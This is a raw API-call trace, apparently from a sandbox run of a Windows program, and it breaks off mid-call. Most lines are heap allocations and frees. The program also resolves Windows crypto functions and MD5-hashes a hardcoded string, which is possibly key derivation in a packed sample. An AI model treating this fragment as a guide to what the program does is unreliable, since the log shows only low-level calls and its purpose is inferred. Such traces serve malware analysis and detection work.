[0089.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0089.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0089.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0089.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0089.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0089.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0089.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0089.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0089.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0089.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0089.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0089.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0089.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0089.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0089.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0089.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0089.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0089.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0089.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0089.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0089.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0089.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0089.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0089.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0089.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0089.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0089.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0089.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0089.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0089.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0089.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0089.404] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0089.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0089.404] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43ca688, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0089.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0089.404] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756feed0 [0089.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0089.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0089.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0089.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0089.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0089.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0089.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0089.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0089.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0089.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0089.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0089.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0089.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0089.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe78 | out: hHeap=0x1780000) returned 1 [0089.405] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e778 | out: phHash=0x144e778) returned 1 [0089.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0089.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43eab80 [0089.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0089.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0089.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0089.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0089.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0089.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0089.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0089.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0089.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0089.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0089.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0089.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0089.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0089.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0089.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0089.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0089.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0089.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0089.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0089.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0089.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0089.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0089.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0089.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0089.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0089.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0089.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0089.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0089.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0089.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0089.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0089.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0089.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0089.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0089.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0089.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0089.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0089.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0089.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0089.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0089.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0089.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0089.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0089.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0089.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0089.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0089.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0089.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0089.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0089.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0089.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0089.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0089.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0089.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0089.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0089.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0089.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0089.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0089.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0089.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0089.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0089.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0089.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0089.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0089.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0089.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0089.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0089.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0089.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0089.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0089.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0089.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0089.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0089.408] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0089.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0089.408] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0089.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0089.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e95f0 [0089.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0089.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e95f0 | out: hHeap=0x1780000) returned 1 [0089.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0089.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0089.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0089.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0089.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0089.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0089.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0089.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0089.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0089.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0089.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0089.409] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0089.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac700 | out: hHeap=0x1780000) returned 1 [0089.409] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0089.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0089.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0089.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0089.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0089.409] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0089.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0089.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0089.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0089.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0089.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0089.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0089.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0089.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0089.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0089.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0089.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0089.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0089.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x22) returned 0x17e2ae8 [0089.410] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0089.410] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e28a8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0089.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e28a8 | out: hHeap=0x1780000) returned 1 [0089.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0089.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0089.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0089.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0089.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0089.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0089.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0089.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0089.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0089.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0089.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0089.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0089.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0089.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0089.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0089.411] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0089.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0089.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0089.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0089.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0089.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0089.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0089.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd60 | out: hHeap=0x1780000) returned 1 [0089.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0089.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f50 | out: hHeap=0x1780000) returned 1 [0089.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0089.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0089.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0089.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0089.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0089.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0089.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0089.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2c08 | out: hHeap=0x1780000) returned 1 [0089.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0089.412] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0089.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0089.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0089.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0089.412] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0089.412] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2ae8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0089.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0089.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2788 | out: hHeap=0x1780000) returned 1 [0089.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0089.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0089.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0089.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0089.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2c08 | out: hHeap=0x1780000) returned 1 [0089.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f28 | out: hHeap=0x1780000) returned 1 [0089.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0089.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0089.412] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0089.412] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0089.413] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0089.413] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca718, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0089.413] CryptHashData (hHash=0x41ac6c0, pbData=0x17e2668, dwDataLen=0x22, dwFlags=0x1) returned 1 [0089.413] CharUpperBuffW (in: 